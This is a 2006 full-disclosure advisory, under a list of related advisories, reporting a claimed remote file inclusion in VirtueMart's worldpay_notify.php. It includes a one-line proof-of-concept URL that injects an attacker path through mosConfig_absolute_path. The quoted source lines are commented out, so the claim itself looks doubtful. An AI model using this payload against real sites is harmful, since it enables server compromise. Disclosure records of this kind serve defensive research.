Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

уязвимости во многих популярных движках из за некоректной работы файловых функций языка PHP

[Full-disclosure] PHProg : Local File Inclusion + XSS + Full path disclosure

[Full-disclosure] KorviBlog - XSS permanent !

Multible injections and vulnerabilities in Jetbox CMS

From:	t3rr0r1st_(at)_aria-security.net <t3rr0r1st_(at)_aria-security.net>
Date:	11.09.2006
Subject:	VirtueMart

#Aria-Security.net Advisory
#Discovered  by: Dr.T3rr0r1st
#< www.Aria-security.net >
#Gr33t to: The-0utl4w & A.u.r.a  & R@1D3N & Smok3r
#-----------------------------------------------------------
Software: VirtueMart
Link: virtumart.net
Attack method: Remote File Inclusion

Source :
//Set up the mailer to infor Warehouse of validated order
   //require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');
   //$mail = new mosPHPMailer();
   //$mail->PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';
   //$mail->SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');

Proof of Concept:
http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=sh
ell

Solution
contact me: Advisory@Aria-Security.net